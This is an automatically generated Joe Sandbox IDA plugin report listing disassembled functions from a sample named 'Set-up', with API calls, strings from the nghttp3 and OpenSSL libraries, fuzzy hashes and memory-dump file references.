Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: a3278af96907b8b8831d03e63b937abc923cc84e83db5b6a0475235b8a6c792a
Instruction ID: 7847596122e5d09b8c16f2c862c27be9ebac21f7c91ad46889abcb6f16e95970
Opcode Fuzzy Hash: a3278af96907b8b8831d03e63b937abc923cc84e83db5b6a0475235b8a6c792a
Instruction Fuzzy Hash: A251D675B043048FD704AF28D880B6AB7E6EB88314F4946BCEC989B3C2EA35DD558B51

Function 00C549A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,00AD836A,?,?,0000012C,000000FF), ref: 00C549BA

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

OCSP_check_validity, xrefs: 00C54A05, 00C54A76, 00C54B09, 00C54B40
crypto/ocsp/ocsp_cl.c, xrefs: 00C54A0F, 00C54A7C, 00C54B0F, 00C54B4A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcpystrlen$_time64
String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
API String ID: 3821555430-713967112
Opcode ID: 037fd0db763d9262ab46e810310fb86448b3e610fd6201788bde1b6f2a41c35e
Instruction ID: a5447ff8c730185c6d686ee0b171f81e9d9aa115e0cece3a95965660361154a1
Opcode Fuzzy Hash: 037fd0db763d9262ab46e810310fb86448b3e610fd6201788bde1b6f2a41c35e
Instruction Fuzzy Hash: CC41587AF48310B7DB007A21EC42F5F37668F81768F094438FD0C5B382E575E995A2A6

Function 00B045C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 00B0468C

Strings

nghttp3_conn.c, xrefs: 00B04682
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B04687

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: bcbe23efd7322e5c740c821cd29636c4fc13bba49914b2586eb5e0f0f2d4640e
Instruction ID: 095836de88d2df7b44dfa603dd68bb87543b4d3aa6bda4b035b06807b7805a3f
Opcode Fuzzy Hash: bcbe23efd7322e5c740c821cd29636c4fc13bba49914b2586eb5e0f0f2d4640e
Instruction Fuzzy Hash: 9331F4716003006FD210DA29EC85FAB7BD8EF86369F0406B9FA58872C2E731E814C7A1

Function 00B04400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 00B044B7

Strings

nghttp3_conn.c, xrefs: 00B044AD
tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 00B044B2

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
API String ID: 1222420520-4133914617
Opcode ID: 3f9b7512897ef36198c8b96cc63e43d34c211d5b1b7b34bc42dd9c31c5882ba4
Instruction ID: c2b03ae9fdfccf73303ae23f0cf9b8e537214e15fb83df217e931cfc32513e44
Opcode Fuzzy Hash: 3f9b7512897ef36198c8b96cc63e43d34c211d5b1b7b34bc42dd9c31c5882ba4
Instruction Fuzzy Hash: 6A21F2B21007016BEB105B66DC45F9B3BDEDF84365F0404A4FA18C62A3EB36D4288761

Function 00DDA0C0 Relevance: 5.3, APIs: 4, Instructions: 327COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DDA161
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DDA2D1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DDA3EC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00DDA499

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: c35dbf2a370d4536a694edc1e4ea6f1ce2ecdae95a8ccca9c45a894313f88fb9
Instruction ID: 99dc29124c4cc06ba91793a532ae41b9ea9f47299e6ecf940f5b33b540b64a92
Opcode Fuzzy Hash: c35dbf2a370d4536a694edc1e4ea6f1ce2ecdae95a8ccca9c45a894313f88fb9
Instruction Fuzzy Hash: B5C18C716043109FCB04DF2CC888A6A7BE5FF88314F59856AF9498B396D771EC50CBA6

Function 00B06140 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,00ADD7A7,?,?,00ADD7A7), ref: 00B061CF

Strings

i < len || offset == 0, xrefs: 00B061CA
nghttp3_stream.c, xrefs: 00B061C5

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: i < len || offset == 0$nghttp3_stream.c
API String ID: 1222420520-1528673747
Opcode ID: 002336c15970d5ffa4a837f6bce14f7ec65dbb4843e909c86afb79cc1b763c3d
Instruction ID: 961878a7fa10bad4cd3eb9f597f7ce43fe59f8f5cac2f82e0e5c35a7dbc51725
Opcode Fuzzy Hash: 002336c15970d5ffa4a837f6bce14f7ec65dbb4843e909c86afb79cc1b763c3d
Instruction Fuzzy Hash: 831182755043048FD304EF29D898FA677E5FF88320F0904BDE98957393DA31A955CB92

Function 00B08700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,00B088D3,00000010,?,?,00000000,00B09AE3,00B0ACDD,-00000010,?,?,?,00000000,?), ref: 00B0873C

Strings

nghttp3_balloc.c, xrefs: 00B08732
(blklen & 0xfu) == 0, xrefs: 00B08737

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
API String ID: 1222420520-1502420682
Opcode ID: 0bd8aaa24d4ef934fb135f0df7a6bc057e53e73d2d2291c80a2a066494762158
Instruction ID: 12445607198f11c0e18b19467dfeb32f5f4a48055fd2f2e807e8ae9588c41485
Opcode Fuzzy Hash: 0bd8aaa24d4ef934fb135f0df7a6bc057e53e73d2d2291c80a2a066494762158
Instruction Fuzzy Hash: 1C11A175649740AFD3229B14EC01B56BFB1EF42B04F1984D9E8889B2D7EA30DD04D792

Function 00B089F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,00B05084,?,?), ref: 00B08A31

Strings

nghttp3_get_varint, xrefs: 00B08A4C
nghttp3_conv.c, xrefs: 00B08A53

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _byteswap_uint64
String ID: nghttp3_conv.c$nghttp3_get_varint
API String ID: 1624361598-912089391
Opcode ID: 2e907d9f9f9364343410567519ff1c881af4b268c7964163ac308b73c8039029
Instruction ID: 70d42e27f922ad0755d066a80670bfe4c70f2229d1ad996226aece2af24a32a4
Opcode Fuzzy Hash: 2e907d9f9f9364343410567519ff1c881af4b268c7964163ac308b73c8039029
Instruction Fuzzy Hash: 61F02BB15001425BE708AF39D841538BBD1EB82312F4882E1F098CE4D4DB78C981FB11

Function 00A8C1D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 00A8C1E5
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A8C1F4

Strings

\/@, xrefs: 00A8C1DF

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlenstrpbrk
String ID: \/@
API String ID: 3089284949-4263999291
Opcode ID: 3e5daef3a7cbe7dbce075e4ed0ff6b245b471ec573ad17682daa07a23c6b5f37
Instruction ID: 36d6c164289312e54b86626b9bdc219dd7884d0f8baa5c149aa623378f985a71
Opcode Fuzzy Hash: 3e5daef3a7cbe7dbce075e4ed0ff6b245b471ec573ad17682daa07a23c6b5f37
Instruction Fuzzy Hash: 51E086D3E0415035DA2131BCFC41AEE535486E1A71F1D0267E458D2244F530894153B2

Function 00B00300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,00B10B2D,5308C483,00000000,00B04D9F,?,00B00EC8), ref: 00B00333

Strings

rcbuf->ref > 0, xrefs: 00B0032E
nghttp3_rcbuf.c, xrefs: 00B00329

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
API String ID: 1222420520-1879435254
Opcode ID: bc086e9f6c197ded5a045b3c08ef68d56424f6fd16e1e126dbb039f34be4489a
Instruction ID: 65ecad6b3a7a1be639195d0414104c21ea0a290bddcc9890ba6e34687c6c54d3
Opcode Fuzzy Hash: bc086e9f6c197ded5a045b3c08ef68d56424f6fd16e1e126dbb039f34be4489a
Instruction Fuzzy Hash: A8E030382106049FCA19AB14D955B65BBE1FF88722F98C1DCF4088B2E1DB71DC02DE05

Function 00C3A170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00C39F60: GetStdHandle.KERNEL32(000000F4), ref: 00C39F76
Part of subcall function 00C39F60: GetFileType.KERNEL32(00000000), ref: 00C39F83
Part of subcall function 00C39F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 00C39FBB

raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,00C3D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00C3DF70,?,?,?,?,?,?,?,00000000), ref: 00C3A18B
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,00C3D8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,00C3DF70,?,?,?,?,?,?,?), ref: 00C3A195

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00C3A17C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: File$HandleTypeWrite_exitraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 2477291680-569889646
Opcode ID: c867854fa78e7d72384c56d266fde103e31567b170d9b1ba5a4d10679e30f870
Instruction ID: dc01f0316db7cd959a249cbd8d4113e821460cc73202f140167c0bfb35f975ae
Opcode Fuzzy Hash: c867854fa78e7d72384c56d266fde103e31567b170d9b1ba5a4d10679e30f870
Instruction Fuzzy Hash: 7CC01272944385AFEB02BFD15C03A6AB565EF65700F081C1CB299240D29BB39534B737

Function 00AA48C0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,000000FF,00000000,00000000), ref: 00AA48DC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA48EB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00AA4905
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA4914

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: af2f4287603d6fac2bdab2cfb24616b36bc301c57cde4d869c810d3ac3d8311c
Instruction ID: e3143091e3004112f2c95af29abd27d5a3b8b439d7648d0f749ec81409bac305
Opcode Fuzzy Hash: af2f4287603d6fac2bdab2cfb24616b36bc301c57cde4d869c810d3ac3d8311c
Instruction Fuzzy Hash: 10F0B47274421576F63032BA6C02F37364CDB96BB4F180234B914EB2C5EAD1DD104271

Function 00DE4230 Relevance: 5.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00A6F9BB,00000000,00A75F07,?,?,00A6F9BB,?), ref: 00DE4290

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

